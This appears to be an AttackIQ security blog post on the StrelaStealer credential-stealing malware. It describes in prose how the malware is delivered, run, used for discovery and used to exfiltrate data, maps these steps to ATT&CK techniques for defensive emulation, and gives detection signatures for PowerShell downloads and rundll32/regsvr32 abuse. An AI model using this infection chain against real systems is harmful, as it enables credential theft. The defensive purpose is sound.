StrelaStealer, also known as Strela, is an information-stealing malware that first appeared in 2022. It is specifically designed to exfiltrate email account credentials from popular email clients such as Microsoft Outlook and Mozilla Thunderbird. StrelaStealer is primarily distributed via large-scale phishing campaigns delivering ZIP archives. These archives typically contain malicious JavaScript (JS) files that act as the initial infection vector. Upon execution, these scripts retrieve a malicious DLL payload from a WebDAV server and execute it directly in memory. The campaigns have affected over 100 organizations across the Europe and the U.S., with a particular focus on victims located in Italy, Spain, Germany, and Ukraine.

In recent analysis, StrelaStealer has been associated with the threat actor group HIVE-0145, a cluster identified for its focus on credential theft and espionage-driven campaigns. As reported by IBM, HIVE-0145 is likely to be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of StrelaStealer.

AttackIQ has released three new attack graphs composed of the several Tactics, Techniques and Procedures (TTPs) exhibited by StrelaStealer during its most recent activities to help customers validate their security controls and their ability to defend against this threat. One of these attack graphs is a malware emulation attack graph which emulates the sequence of behaviors associated with the deployment of StrelaStealer on a compromised system.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new attack graphs in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against baseline behaviors associated with StrelaStealer
• Assess their security posture against an information stealer family targeting victims worldwide.
• Continuously validate detection and prevention pipelines against an emerging threat and its behaviors.

StrelaStealer – 2024-01 – Large-Scale Email Campaign Leads to StrelaStealer Deployment

In March 2024, Unit 42 reported a large-scale StrelaStealer campaign targeting over 100 organizations across the EU and U.S. The malware, designed to steal email login credentials from clients like Microsoft Outlook and Mozilla Thunderbird, was distributed via spam emails containing ZIP archives with JavaScript files. These scripts ultimately launched the StrelaStealer DLL payload. To evade detection, attackers varied the initial email attachment formats and updated the DLL payload with enhanced obfuscation and anti-analysis techniques from previous campaigns.

Initial Access – Malware Deployment

This stage begins with the deployment of a ZIP archive containing a JavaScript file. The script is decoded using CertUtil, leading to the creation of the final StrelaStealer payload, a Dynamic Link Library (DLL) file, which is then executed via RunDLL32.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Deobfuscate/Decode Files or Information (T1140): This scenario utilizes the legitimate certutil binary to decode a base64 encoded payload.

System Binary Proxy Execution: Rundll32 (T1218.011): This scenario executes an exported function from a specific DLL using the rundll32.exe Windows utility.

Discovery & Exfiltration – System Reconnaissance and Exfiltrate Files

This stage focuses on discovery and exfiltration activities. It gathers information about the system, installed applications, country locale, internet connectivity, and performs file system enumeration. Finally, the collected data is exfiltrated over HTTP.

System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

System Information Discovery (T1082): This scenario calls the GetComputerNameA Windows API to gather the NetBIOS name.

Software Discovery (T1518): This scenario executes a Powershell script using the Get-ChildItem cmdlet to determine the different applications installed in the system.

System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.

System Information Discovery (T1082): This scenario executes the InternetCheckConnectionA Windows API call to verify internet access.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario generates fake sensitive data which is exfiltrated over unencrypted HTTP POST requests to an AttackIQ controlled server.

StrelaStealer – 2024-11 – JavaScript File Leads to StrelaStealer Deployment

In November 2024, Logpoint reported a new StrelaStealer campaign featuring updated delivery and obfuscation techniques. While the initial payload remains a JavaScript (JS) file delivered via a ZIP archive through malspam, the attackers introduced the use of WScript to spawn a PowerShell process that executes an encoded command. This command uses net use to map a WebDAV network path, followed by the use of Regsvr32 to remotely register and execute a DLL payload hosted on that share.

Initial Access – Malware Deployment

This stage begins with the execution of the initial JavaScript payload via CScript, which launches an encoded PowerShell command that leverages net use to map a network path to a WebDAV share. Finally, Regsvr32 is used to remotely register and execute a Dynamic Link Library (DLL) file hosted on that share.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Command and Scripting Interpreter: JavaScript (T1059.007): This scenario attempts to execute a JavaScript file via cscript.exe.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell’s -encodedCommand parameter.

System Network Connections Discovery (T1049): This scenario executes the net use Windows Command to retrieve information about the system’s network shares.

System Binary Proxy Execution: Regsvr32 (T1218.010): RegSvr32 is a native Windows utility that threat actors can use to register Common Object Model (COM) DLLs. This functionality allows an actor to deploy a malicious DLL and have a native Windows tool execute the code as the parent process. This scenario executes RegSvr32 with an AttackIQ binary.

Discovery & Exfiltration – System Reconnaissance and Exfiltrate Files

This stage focuses on discovery and exfiltration activities. It gathers information about the system, installed applications, country locale, internet connectivity, and performs file system enumeration. Finally, the collected data is exfiltrated over HTTP.

System Information Discovery (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

System Information Discovery (T1082): This scenario calls the GetComputerNameA Windows API to gather the NetBIOS name.

Software Discovery (T1518): This scenario executes a Powershell script using the Get-ChildItem cmdlet to determine the different applications installed in the system.

System Location Discovery (T1614): This scenario executes the GetLocaleInfoA Windows API to retrieve the user default country locale code from the local computer.

System Information Discovery (T1082): This scenario executes the InternetCheckConnectionA Windows API call to verify internet access.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003): This scenario generates fake sensitive data which is exfiltrated over unencrypted HTTP POST requests to an AttackIQ controlled server.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

2. System Binary Proxy Execution: Rundll32 (T1218.011) and Regsvr32 (T1218.010):

Adversaries may use DLL files for many of their malware payloads and use native Windows utilities to execute them. The primary native methods for executing these files is to call the RunDll32 or RegSvr32 utilities and pass along the path and export function to be executed.

2a. Detection

While these two native tools are commonly used by legitimate applications there are behaviors related to their execution that can stand out in your process logs. Searching for files that are being executed from temporary directories, that don’t have the standard .dll file extension, or call strange looking export names can stand out from regular user behavior.

Process Name == (rundll32.exe OR regsvr32.exe)
Command Line CONTAINS (‘TEMP’ OR ‘.png’ OR ‘Roaming’ OR ‘%APPDATA%’)

2b. Mitigation

• M1050 – Exploit Protection

Wrap Up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against StrelaStealer. With data generated from continuous testing and the use of these attack graphs, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.